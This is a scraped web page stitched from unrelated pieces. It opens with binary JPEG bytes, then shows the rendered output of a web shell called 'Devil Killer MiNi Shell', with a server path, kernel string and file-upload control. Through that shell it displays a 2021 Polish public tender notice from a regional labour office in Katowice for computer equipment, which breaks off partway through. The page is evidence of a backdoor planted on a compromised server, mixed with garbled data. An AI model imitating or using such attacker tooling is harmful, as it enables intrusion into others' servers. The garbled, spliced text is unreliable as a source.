JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211020/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211020/0023919601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu komputerowego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WOJEWÓDZKI URZĄD PRACY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276855696</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Kościuszki 30</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-048</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 757 33 60</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">32 757 33 62</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wup@wup-katowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://wupkatowice.praca.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka organizacyjna samorządu województwa nieposiadająca osobowości prawnej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu komputerowego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9c5f7622-30d2-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00239196</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000417/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup sprzętu komputerowego, sieciowego, akcesoriów komputerowych oraz drukarek</p> <p class="mb-0">1.2.5 Zakup akcesoriów i części komputerowych, komputerów, drukarek wielofunkcyjnych, nośników danych, pakietów biurowych</p> <p class="mb-0">1.2.6 Zakup 2 zestawów komputerowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program Operacyjny Wiedza Edukacja Rozwój 2014-2020 i Regionalny Program Operacyjny Województwa Śląskiego na lata 2014-2020 (dot. części I i II) </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/521435 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformy: platformazakupowa.pl pod adresem: https://platformazakupowa.pl/transakcja/521435 2. Wymaga się, aby komunikacja z Wykonawcami odbywała się tylko poprzez platformę zakupową za pośrednictwem formularza “Wyślij wiadomość do Zamawiającego”, nie za pośrednictwem adresu email.Uwaga: korespondencja przesłana w inny sposób niż poprzez platformę nie będzie brana pod uwagę, zostanie uznana jako<br/>złożona nieskutecznie. Zamawiający nie będzie informował o błędnym złożeniu korespondencji. Adres strony internetowej: https://platformazakupowa.pl/transakcja/521435</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Komunikacja między Zamawiającym a Wykonawcami w zakresie:- przesyłania Zamawiającemu pytań do treści SWZ;- przesyłania odpowiedzi na wszelkie wezwania Zamawiającego wynikające z ustawy - Prawo zamówień publicznych;- przesyłania wniosków, informacji, oświadczeń Wykonawcy;<br/>przesyłania odwołania lub innych dokumentów - odbywa się za pośrednictwem<br/>https://platformazakupowa.pl/transakcja/521435 i formularza „Wyślij wiadomość do Zamawiającego”. 2. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje siędatę ich przesłania za pośrednictwem https://platformazakupowa.pl/transakcja/521435<br/>poprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego” po którym pojawi się komunikat, że wiadomość została wysłana do Zamawiającego.<br/>3. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem https://platformazakupowa.pl/transakcja/521435 Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia<br/>ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której adresatem, zgodnie z obowiązującymi przepisami, jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem https://platformazakupowa.pl/transakcja/521435 do<br/>konkretnego Wykonawcy. 4. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/>https://platformazakupowa.pl/transakcja/521435 przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.5. Zamawiający, określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl,<br/>tj.:a. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,b. komputer klasy PC lub MAC o następującej konfiguracji:pamięć min. 2 GB Ram, procesor Intel IV 2 GHz lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje,c. zainstalowana dowolna przeglądarka internetowa w najnowszej dostępnej wersji (zalecane przeglądarki: Internet Explorer, Chrome i Mozilla Firefox)d. włączona obsługa JavaScript,e. zainstalowany program Adobe AcrobatReader lub inny obsługujący format plików .pdf,f. Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.g. Oznaczenie czasu odbioru danych przez platformę zakupową stanowidatę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. 6. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:a.akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na<br/>stronie internetowej pod linkiem w zakładce „Regulamin&#34;oraz uznaje go za wiążący,b. zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem. 7. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce„Wyślij wiadomość do Zamawiającego”). Oferta wraz z załącznikami oraz wszelkie inne dokumenty przekazywane w późniejszym czasie Zamawiającemu muszą zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem osobistym.Wszelkie pozostałe szczegółowe informacje zostały zawarte w SWZ do niniejszego postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: 1. Administratorem Pani/Pana danych osobowych jest Wojewódzki Urząd Pracy adres: ul. Kościuszki 30, 40-048 Katowice, tel: 32 757 33 60fax: 32 757 33 62;2. Inspektorem ochrony danych osobowych w Wojewódzkim Urzędzie Pracy wKatowicach jest Pani Justyna Nowak, kontakt: iod@wup-katowice.pl, telefon: (32) 757 33 06;3.Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z postępowaniem o udzielenie zamówienia publicznego TP/11/21 pn: „Dostawa sprzętu komputerowego”. 4. Odbiorcami Pani/Pana danych osobowych<br/>będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art.18 oraz art. 74 ustawy Pzp; 5. Pani/Pana daneosobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie<br/>zamówienia publicznego;konsekwencje niepodania określonych danych wynikają z ustawy;7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; 8. Posiada Pani/Pan:- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;- na podstawie art. 16 RODO prawo do<br/>sprostowania Pani/Pana danych osobowych;- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;9. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu;10. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu;11.Nie przysługuje<br/>Pani/Panu:- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;12. Na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego<br/>udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa wart. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TP/11/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 529410,47 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 245964,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa fabrycznie nowych, nienoszących śladów używania: <br/>•	zestawów, składających się z: komputera stacjonarnego, pakietu biurowego, licencji dostępowej i jednego lub dwóch adapterów, w ilości 22 sztuk,<br/>•	monitorów komputerowych w ilości 4 sztuk.<br/><br/>Zamawiający wymaga, aby:<br/>●	wszystkie zaoferowane komputery pochodziły od jednego producenta oraz były jednego modelu i w jednakowej konfiguracji sprzętowej,<br/>●	wszystkie zaoferowane pakiety biurowe pochodziły od jednego producenta oraz były jednego modelu i pochodziły z najnowszej linii produktowej producenta pakietu biurowego,<br/>●	wszystkie zaoferowane licencje dostępowe pochodziły od jednego producenta oraz były jednego modelu i pochodziły z najnowszej linii produktowej producenta licencji dostępowej,<br/>●	wszystkie zaoferowane adaptery pochodziły od jednego producenta,<br/>●	wszystkie zaoferowane monitory komputerowe pochodziły od jednego producenta oraz były jednego modelu i w jednakowej konfiguracji sprzętowej.<br/><br/>Szczegółowy opis przedmiotu zamówienia został określony w SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 100014,94 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213300-8 - Komputer biurkowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30230000-0 - Sprzęt związany z komputerami</p> <p class="mb-0">30237000-9 - Części, akcesoria i wyroby do komputerów</p> <p class="mb-0">48214000-1 - Pakiety oprogramowania do sieciowego systemu operacyjnego</p> <p class="mb-0">48310000-4 - Pakiety oprogramowania do tworzenia dokumentów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Kryterium: cena – waga 60 pkt.<br/><br/>	Ocena punktowa wskazanego kryterium dokonana zostanie zgodnie z formułą:<br/><br/> Najniższa cena brutto spośród wszystkich ofert <br/>	------------------------------------------------------------------ x 60 <br/> Cena brutto badanej oferty<br/><br/>2)	Okres świadczenia obsługi posprzedażowej – waga: 30 pkt.<br/>Zamawiający będzie przyznawał punkty w następujący sposób:<br/>●	brak świadczenia obsługi posprzedażowej – 0 pkt.<br/>●	1 rok świadczenia obsługi posprzedażowej – 10 pkt.<br/>●	2 lata świadczenia obsługi posprzedażowej – 20 pkt.<br/>●	3 lata świadczenia obsługi posprzedażowej – 30 pkt.<br/><br/><br/>3)	Kryterium społeczne (zatrudnienie do realizacji zamówienia osoby z niepełnosprawnościami): waga – 10 pkt<br/><br/>Zamawiający przyzna ofercie 10 punktów, jeżeli Wykonawca zadeklaruje zatrudnienie do realizacji zamówienia minimum 1 osoby z niepełnosprawnościami. <br/><br/> W ramach kryteriów oceny ofert, oferta Wykonawcy może uzyskać łącznie maksimum 100 punktów. Zamawiający za najkorzystniejszą uzna ofertę, która uzyska największą ilość (sumę) punktów w części I za kryteria: cena, okres świadczenia obsługi posprzedażowej oraz kryterium społeczne. Stanowić ona będzie końcową ocenę oferty.<br/><br/> Szczegółowy opis sposobu oceny ofert został określony w SWZ w pkt. 18.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2)	Okres świadczenia obsługi posprzedażowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">3)	Kryterium społeczne (zatrudnienie do realizacji zamówienia osoby z niepełnosprawnościami)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa fabrycznie nowych, nienoszących śladów używania 28 sztuk zestawów składających się z: laptopa, myszy komputerowej, torby na laptop, routera, pakietu biurowego i licencji dostępowej<br/><br/>Zamawiający wymaga, aby:<br/>●	wszystkie zaoferowane laptopy pochodziły od jednego producenta oraz były jednego modelu i w jednakowej konfiguracji sprzętowej.<br/>●	wszystkie zaoferowane myszy komputerowe pochodziły od jednego producenta oraz były jednego modelu i w jednakowej konfiguracji sprzętowej.<br/>●	wszystkie zaoferowane torby na laptop pochodziły od jednego producenta oraz były jednego modelu.<br/>●	wszystkie zaoferowane routery pochodziły od jednego producenta oraz były jednego modelu i w jednakowej konfiguracji sprzętowej.<br/>●	wszystkie zaoferowane pakiety biurowe pochodziły od jednego producenta oraz były jednego modelu i pochodziły z najnowszej linii produktowej producenta pakietu biurowego.<br/>●	wszystkie zaoferowane licencje dostępowe pochodziły od jednego producenta oraz były jednego modelu i pochodziły z najnowszej linii produktowej producenta licencji dostępowej.<br/><br/>Szczegółowy opis przedmiotu zamówienia został określony w SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 124171,58 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213100-6 - Komputery przenośne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30230000-0 - Sprzęt związany z komputerami</p> <p class="mb-0">30237000-9 - Części, akcesoria i wyroby do komputerów</p> <p class="mb-0">48214000-1 - Pakiety oprogramowania do sieciowego systemu operacyjnego</p> <p class="mb-0">48310000-4 - Pakiety oprogramowania do tworzenia dokumentów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Kryterium: cena – waga 60 pkt.<br/><br/>	Ocena punktowa wskazanego kryterium dokonana zostanie zgodnie z formułą:<br/><br/> Najniższa cena brutto spośród wszystkich ofert <br/>	------------------------------------------------------------------ x 60 <br/> Cena brutto badanej oferty<br/><br/>2)	Okres świadczenia obsługi posprzedażowej – waga: 30 pkt.<br/>Zamawiający będzie przyznawał punkty w następujący sposób:<br/>●	brak świadczenia obsługi posprzedażowej – 0 pkt.<br/>●	1 rok świadczenia obsługi posprzedażowej – 10 pkt.<br/>●	2 lata świadczenia obsługi posprzedażowej – 20 pkt.<br/>●	3 lata świadczenia obsługi posprzedażowej – 30 pkt.<br/><br/>3)	Kryterium społeczne (zatrudnienie do realizacji zamówienia osoby z niepełnosprawnościami): waga – 10 pkt<br/><br/>Zamawiający przyzna ofercie 10 punktów, jeżeli Wykonawca zadeklaruje zatrudnienie do realizacji zamówienia minimum 1 osoby z niepełnosprawnościami. <br/><br/> <br/>W ramach kryteriów oceny ofert, oferta Wykonawcy może uzyskać łącznie maksimum 100 punktów. 